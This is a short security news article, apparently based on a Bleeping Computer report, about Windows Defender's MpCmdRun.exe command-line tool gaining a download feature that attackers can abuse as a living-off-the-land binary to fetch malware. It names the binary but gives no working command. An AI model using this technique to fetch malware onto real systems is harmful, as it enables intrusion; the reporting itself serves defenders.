Windows 10 built-in antivirus software has derived a new function following its a new update. There is a path opened for the downloading of information using command line applications that contain malware like Spyware, Trojans, ransomware, among others.
We do not want to believe that this new update was specifically designed for downloading malware considering the fact that abuse can occur in the use of new features.
The upside, however, is that an average computer user has nothing to be really worried about compared to people that are “extra” in the use of computers.
Mohammed Asker (via Bleeping Computer), a protection penetration tester, and a teacher who is responsible for the posting of several safety articles on Udemy commented on this recent feature.
Using his Twitter handle, he stated that Windows Defender in itself can be used to download files from the internet.
He continued by explaining that he could use the binary “MpCmdRun.exe” which is “Microsoft Malware Protection Command Line” to get hold of the Cobalt Strike Beacon.
This gives room for an attacker to effectively use Defender as a so-called Defender called living-off-the-land binary (LOLBin). This is where legitimate software can be abused and used for malicious purposes, which in this case is the download of a virus from an antivirus program.
The tendency has been available for nearly two months when this new aspect was included to Defender in the July 4.18.2007.8 update.
Bleeping Computer did an examination of a new load switch for its command-line device and was able to download the exact WastedLocker ransomware that lately caused a disorder in Garmin’s infrastructure.
Reports show that this led to the payment of a multi-million dollar ransom by the company.
This is not something to be so worried about as the Defender still retains its ability to scan files downloaded through this method.
Theoretically, it should still give protection against malware. Also, a local user would be needed to initiate this.
Even so, system administrators should take note of this so as to observe proper safety measures.
It is not exactly strange for an employee to go rogue and cause mischief due to bitterness toward a situation in the company, or because of a threat of dismissal from the company, among other reasons.